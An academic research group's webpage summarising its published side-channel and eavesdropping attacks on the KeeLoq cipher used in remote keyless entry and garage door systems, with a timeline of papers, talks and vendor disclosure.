A complete break of the KeeLoq access control system.
The KeeLoq encryption algorithm is widely used for security relevant applications in the form of passive Radio Frequency Identification (RFID) transponders for physical access control systems, e.g., for garage door opening or building access.
We present the first successful DPA (Differential Power Analysis) attacks on numerous commercially available products employing KeeLoq. These so-called side-channel attacks are based on measuring and evaluating the power consumption of a KeeLoq device during its operation. Using our techniques, an attacker can reveal not only the secret key of remote controls in less than one hour, but also the manufacturer key of the corresponding receivers in less than one day. Knowing the manufacturer key allows for creating an arbitrary number of valid new keys and generating new remote controls.
We further propose a new eavesdropping attack for which monitoring of two ciphertexts, sent from a remote control employing KeeLoq code hopping (car key, garage door opener, etc.), is sufficient to recover the device key of the remote control. Hence, using the methods described by us, an attacker can clone a remote control from a distance and gain access to a target that is protected by the claimed to be „highly secure“ KeeLoq algorithm.
We consider our attacks to be of serious practical interest, as commercial KeeLoq access control systems can be overcome with modest effort.
- July 19, 2009: Update on Attacks, Simple Power Analysis is possible
By means of Simple Power Analysis (SPA), now we can recover the manufacturer key embedded in a KeeLoq receiver using a single power trace. The relevant paper „Breaking KeeLoq in a Flash: On Extracting Keys at Lightning Speed“ got accepted at Africacrypt 2009 and has been presented in Gammarth, Tunisia in June 2009.
- December 27, 2008: Presentation on the 25th Chaos Communication Congress in Berlin
„Messing Around with Garage Doors – Breaking Remote Keyless Entry Systems with Power Analysis “ Full video of the talk (an extended Version of Christof Paar’s talk on CRYPTO 2008) including life demonstrations:
- May 6, 2008: KeeLoq paper accepted at Crypto 2008
Our paper „On the Power of Power Analysis in the Real World: A Complete Break of the KeeLoq Code Hopping Scheme“ got accepted at Crypto 2008 and will be presented in Santa Barbara in August 2008.
- April 5, 2008: EMSEC demonstrates KeeLoq attacks on German television
- March 31, 2008: Press Release about the KeeLoq attack available
- March 29, 2008: Website launched
This website has been launched.
- February 2, 2008: Scientific paper on KeeLoq attack released
A paper describing the scientific aspects of our attacks has been published on the eprint server.
Physical Cryptanalysis of KeeLoq Code Hopping Applications
- December 2007
We succeed with recovering both the manufacturer key and the device key from several real-world systems emplyoing the KeeLoq cipher. We inform one manufacturer of KeeLoq products about the attacks.